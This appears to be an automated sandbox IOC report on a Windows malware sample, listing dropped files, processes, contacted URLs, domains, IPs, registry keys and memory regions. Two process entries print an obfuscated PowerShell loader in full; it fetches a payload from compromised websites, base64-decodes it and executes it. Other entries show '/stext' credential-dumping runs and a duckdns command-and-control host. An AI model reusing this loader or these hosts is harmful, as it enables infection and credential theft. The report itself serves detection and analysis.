IOC Report
17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe

loading gif

Files

File Path
Type
Category
Malicious
17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs
ASCII text, with very long lines (2168), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\sfvnspt.dat
data
dropped
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_51mj0ygu.nlc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5m414cg.t0o.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kyf3u1w1.rxk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrxwzsgb.akj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhvF6CA.tmp
Extensible storage user DataBase, version 0x620, checksum 0x4061f958, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\zvvuwrolfaxlvl
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Snigmyrdede.Sko
ASCII text, with very long lines (65536), with no line terminators
dropped
There are 4 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
"C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs"
malicious
C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\zvvuwrolfaxlvl"
malicious
C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\kpjewkzmtipqfrcbhk"
malicious
C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe /stext "C:\Users\user\AppData\Local\Temp\mroxxckghqhciyqfqvohn"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"

URLs

Name
IP
Malicious
iwarsut775laudrye2.duckdns.org
malicious
http://www.imvu.comr
unknown
https://asociatiatraditiimaria.ro/feed/
unknown
http://crl.microsoft
unknown
https://aefd.nelreports.net/api/report?cat=bingth
unknown
http://geoplugin.net/json.gplA
unknown
https://contoso.com/License
unknown
https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm
34.166.62.190
http://www.nirsoft.net
unknown
https://aefd.nelreports.net/api/report?cat=bingaotak
unknown
https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
https://gmpg.org/xfn/11
unknown
https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=1720763767
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1
unknown
https://www.google.com
unknown
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
unknown
http://geoplugin.net/json.gp/C
unknown
https://aka.ms/pscore6lB
unknown
https://asociatiatraditiimaria.ro
unknown
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://asociatiatraditiimaria.ro/os/transportment.pfm
93.113.54.56
https://login.yahoo.com/config/login
unknown
https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm0
unknown
http://www.nirsoft.net/
unknown
http://crl.mB
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
unknown
https://www.office.com/
unknown
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://www.imvu.compData
unknown
http://geoplugin.net/json.gpp
unknown
https://asociatiatraditiimaria.ro/comments/feed/
unknown
http://www.imvu.com
unknown
https://aefd.nelreports.net/api/report?cat=wsb
unknown
https://api.w.org/
unknown
https://contoso.com/Icon
unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
unknown
https://asociatiatraditiimaria.ro/wp-json/
unknown
http://crl.microsoft.
unknown
https://github.com/Pester/Pester
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://geoplugin.net/json.gpRN
unknown
http://crl.micro
unknown
https://aefd.nelreports.net/api/report?cat=bingaot
unknown
https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.2
unknown
https://new.quranushaiqer.org.sa
unknown
https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfml
unknown
https://aefd.nelreports.net/api/report?cat=bingrms
unknown
https://www.google.com/accounts/servicelogin
unknown
http://www.ebuddy.com
unknown
There are 46 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
iwarsut775laudrye2.duckdns.org
192.253.251.227
malicious
bg.microsoft.map.fastly.net
199.232.210.172
asociatiatraditiimaria.ro
93.113.54.56
geoplugin.net
178.237.33.50
new.quranushaiqer.org.sa
34.166.62.190

IPs

IP
Domain
Country
Malicious
192.253.251.227
iwarsut775laudrye2.duckdns.org
United States
malicious
34.166.62.190
new.quranushaiqer.org.sa
United States
93.113.54.56
asociatiatraditiimaria.ro
Romania
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\shietgtst-A57Q98
exepath
HKEY_CURRENT_USER\SOFTWARE\shietgtst-A57Q98
licence
HKEY_CURRENT_USER\SOFTWARE\shietgtst-A57Q98
time
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 11 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
459000
unkown
page readonly
malicious
72E000
heap
page read and write
malicious
459000
unkown
page readonly
malicious
A795000
direct allocation
page execute and read and write
malicious
459000
unkown
page readonly
malicious
459000
unkown
page readonly
malicious
459000
unkown
page readonly
malicious
7DE000
heap
page read and write
7E2000
heap
page read and write
4B6E000
stack
page read and write
4C91000
trusted library allocation
page read and write
6380000
heap
page read and write
2581000
heap
page read and write
27B9000
heap
page read and write
219D000
heap
page read and write
755F000
stack
page read and write
5E4000
heap
page read and write
7DC000
heap
page read and write
27CE000
heap
page read and write
2AE000
heap
page read and write
3120000
trusted library allocation
page read and write
4AAE000
stack
page read and write
8B90000
trusted library allocation
page execute and read and write
769D000
heap
page read and write
5D17000
heap
page read and write
27B9000
heap
page read and write
7DFE000
stack
page read and write
8800000
heap
page read and write
2A8F000
unkown
page read and write
8690000
trusted library allocation
page read and write
2161000
heap
page read and write
27BE000
heap
page read and write
5D40000
heap
page read and write
27B1000
heap
page read and write
37F6000
unclassified section
page execute and read and write
A26000
heap
page read and write
5D0A000
heap
page read and write
27CB000
heap
page read and write
356E000
stack
page read and write
6FF0000
trusted library allocation
page read and write
81C0000
trusted library allocation
page execute and read and write
7A00000
trusted library allocation
page execute and read and write
44F6000
trusted library allocation
page read and write
3C07000
heap
page read and write
27CB000
heap
page read and write
7DC000
heap
page read and write
5CFD000
heap
page read and write
401000
unkown
page execute read
34D4000
heap
page read and write
2BD0000
heap
page read and write
8884000
heap
page read and write
1F0000
heap
page read and write
76F0000
heap
page read and write
5852000
heap
page read and write
77A0000
trusted library allocation
page read and write
4C4000
heap
page read and write
66CB000
stack
page read and write
5D2F000
heap
page read and write
67CA000
stack
page read and write
46E000
stack
page read and write
34DF000
heap
page read and write
5852000
heap
page read and write
34D4000
heap
page read and write
79F0000
trusted library allocation
page read and write
23DD000
stack
page read and write
342E000
unkown
page read and write
5835000
heap
page read and write
5FDA000
heap
page read and write
7DC000
heap
page read and write
27D9000
heap
page read and write
7B10000
trusted library allocation
page read and write
817000
heap
page read and write
6FE0000
trusted library allocation
page read and write
27D4000
heap
page read and write
3180000
heap
page read and write
474000
unkown
page read and write
6DE5000
heap
page read and write
34C3000
heap
page read and write
39D0000
heap
page read and write
877C000
stack
page read and write
27EE000
heap
page read and write
7581000
heap
page read and write
684F000
stack
page read and write
27CF000
heap
page read and write
610000
heap
page read and write
3516000
heap
page read and write
3516000
heap
page read and write
7DA000
heap
page read and write
4BE000
stack
page read and write
7A80000
trusted library allocation
page read and write
4487000
trusted library allocation
page read and write
409C000
stack
page read and write
4C4000
heap
page read and write
27B9000
heap
page read and write
33E0000
heap
page read and write
5DD8000
heap
page read and write
6F3D000
stack
page read and write
4C4000
heap
page read and write
5E4000
heap
page read and write
7A90000
heap
page read and write
78DE000
stack
page read and write
400000
unkown
page readonly
27CB000
heap
page read and write
27F4000
heap
page read and write
79F000
stack
page read and write
8A3000
heap
page read and write
34E3000
heap
page read and write
A26000
heap
page read and write
7800000
trusted library allocation
page read and write
7A40000
trusted library allocation
page read and write
27E9000
heap
page read and write
5DA9000
heap
page read and write
27BB000
heap
page read and write
27B9000
heap
page read and write
27BE000
heap
page read and write
3503000
heap
page read and write
5C0000
heap
page read and write
646000
heap
page read and write
5DA8000
heap
page read and write
27E0000
trusted library allocation
page execute and read and write
4C5000
heap
page read and write
6CE0000
trusted library allocation
page read and write
2171000
heap
page read and write
51C9000
trusted library allocation
page read and write
3C05000
heap
page read and write
27CB000
heap
page read and write
3D51000
heap
page read and write
5CF7000
heap
page read and write
2240000
heap
page read and write
3516000
heap
page read and write
20A8000
heap
page read and write
3503000
heap
page read and write
6F40000
trusted library allocation
page execute and read and write
30F0000
trusted library allocation
page read and write
5D0A000
heap
page read and write
3FA0000
trusted library allocation
page read and write
4AF0000
heap
page read and write
34D8000
heap
page read and write
27E7000
heap
page read and write
85D0000
trusted library allocation
page execute and read and write
79E7000
stack
page read and write
5D66000
heap
page read and write
5AAD000
stack
page read and write
27BB000
heap
page read and write
27BE000
heap
page read and write
34BA000
heap
page read and write
63E000
stack
page read and write
327E000
stack
page read and write
5D28000
heap
page read and write
4C4000
heap
page read and write
79F000
heap
page read and write
37FC000
unclassified section
page execute and read and write
4C4000
heap
page read and write
7E87000
heap
page read and write
789E000
stack
page read and write
5E10000
remote allocation
page read and write
880D000
heap
page read and write
34F5000
heap
page read and write
8876000
heap
page read and write
27BE000
heap
page read and write
793000
heap
page read and write
6F80000
trusted library allocation
page read and write
7CC000
heap
page read and write
782000
heap
page read and write
8530000
heap
page read and write
3430000
heap
page read and write
65DB000
stack
page read and write
76F000
heap
page read and write
38FE000
stack
page read and write
2171000
heap
page read and write
319A000
heap
page read and write
273F000
stack
page read and write
7A10000
trusted library allocation
page read and write
8470000
heap
page read and write
3109000
trusted library allocation
page read and write
6F50000
trusted library allocation
page read and write
5333000
trusted library allocation
page read and write
4C4000
heap
page read and write
219D000
heap
page read and write
2161000
heap
page read and write
65F0000
heap
page execute and read and write
5F80000
heap
page read and write
27CE000
heap
page read and write
2780000
trusted library allocation
page read and write
4534000
trusted library allocation
page read and write
3503000
heap
page read and write
87F000
stack
page read and write
3503000
heap
page read and write
76F000
heap
page read and write
70F5000
heap
page execute and read and write
478000
unkown
page readonly
34E7000
heap
page read and write
37A0000
unclassified section
page execute and read and write
27B1000
heap
page read and write
27BC000
heap
page read and write
34E5000
heap
page read and write
2730000
trusted library section
page read and write
18F000
stack
page read and write
2790000
trusted library allocation
page read and write
66DC000
stack
page read and write
3B51000
heap
page read and write
68C000
stack
page read and write
2581000
heap
page read and write
79ED000
stack
page read and write
2160000
heap
page read and write
4C4000
heap
page read and write
27D0000
heap
page read and write
6C70000
trusted library allocation
page read and write
7B95000
trusted library allocation
page read and write
6F70000
trusted library allocation
page read and write
7A60000
trusted library allocation
page read and write
5E6E000
stack
page read and write
27CF000
heap
page read and write
70E000
stack
page read and write
19A000
stack
page read and write
27FB000
heap
page read and write
A2D000
heap
page read and write
27CB000
heap
page read and write
29B0000
trusted library allocation
page read and write
27C0000
heap
page read and write
4AEC000
stack
page read and write
5833000
heap
page read and write
9C000
stack
page read and write
29B0000
trusted library allocation
page read and write
6D69000
heap
page read and write
6DB9000
heap
page read and write
447F000
trusted library allocation
page read and write
2238000
heap
page read and write
2E19000
unclassified section
page execute and read and write
793000
heap
page read and write
473000
system
page execute and read and write
867C000
stack
page read and write
30FD000
trusted library allocation
page execute and read and write
351E000
heap
page read and write
2740000
heap
page read and write
471000
unkown
page read and write
5FD5000
heap
page read and write
3957000
heap
page read and write
3503000
heap
page read and write
455D000
trusted library allocation
page read and write
27B8000
heap
page read and write
27B1000
heap
page read and write
27E9000
heap
page read and write
218E000
heap
page read and write
7EA1000
heap
page read and write
7BF000
heap
page read and write
7000000
trusted library allocation
page read and write
27BC000
heap
page read and write
8490000
trusted library allocation
page read and write
75F000
heap
page read and write
34D6000
heap
page read and write
5D3C000
heap
page read and write
40DE000
stack
page read and write
27C3000
heap
page read and write
27AF000
stack
page read and write
6FD0000
trusted library allocation
page read and write
76F000
heap
page read and write
7CC000
heap
page read and write
10001000
direct allocation
page execute and read and write
4CF7000
trusted library allocation
page read and write
3122000
trusted library allocation
page read and write
5CFE000
heap
page read and write
583A000
heap
page read and write
5852000
heap
page read and write
34F0000
heap
page read and write
30D0000
trusted library section
page read and write
72A000
heap
page read and write
2175000
heap
page read and write
5A6D000
stack
page read and write
4559000
trusted library allocation
page read and write
5D32000
heap
page read and write
360B000
heap
page read and write
34FC000
heap
page read and write
8848000
heap
page read and write
7E80000
heap
page read and write
30A0000
heap
page read and write
27D2000
heap
page read and write
4B10000
trusted library allocation
page read and write
5BFE000
stack
page read and write
3FC0000
trusted library allocation
page read and write
76D9000
heap
page read and write
2161000
heap
page read and write
5E4000
heap
page read and write
3100000
trusted library allocation
page read and write
7A8D000
stack
page read and write
3957000
heap
page read and write
2591000
heap
page read and write
5E4000
heap
page read and write
27CB000
heap
page read and write
3516000
heap
page read and write
3420000
heap
page read and write
5D47000
heap
page read and write
680000
heap
page read and write
5E4000
heap
page read and write
7777000
heap
page read and write
2161000
heap
page read and write
6C80000
trusted library allocation
page read and write
8480000
trusted library allocation
page execute and read and write
27C0000
heap
page read and write
7EBE000
heap
page read and write
8840000
heap
page read and write
27C1000
heap
page read and write
5E4000
heap
page read and write
27E9000
heap
page read and write
2238000
heap
page read and write
10000000
direct allocation
page read and write
27D9000
heap
page read and write
6F60000
trusted library allocation
page read and write
5E4000
heap
page read and write
572F000
stack
page read and write
21A3000
heap
page read and write
27C5000
heap
page read and write
3516000
heap
page read and write
27C0000
trusted library allocation
page read and write
27B1000
heap
page read and write
92A0000
direct allocation
page execute and read and write
34D4000
heap
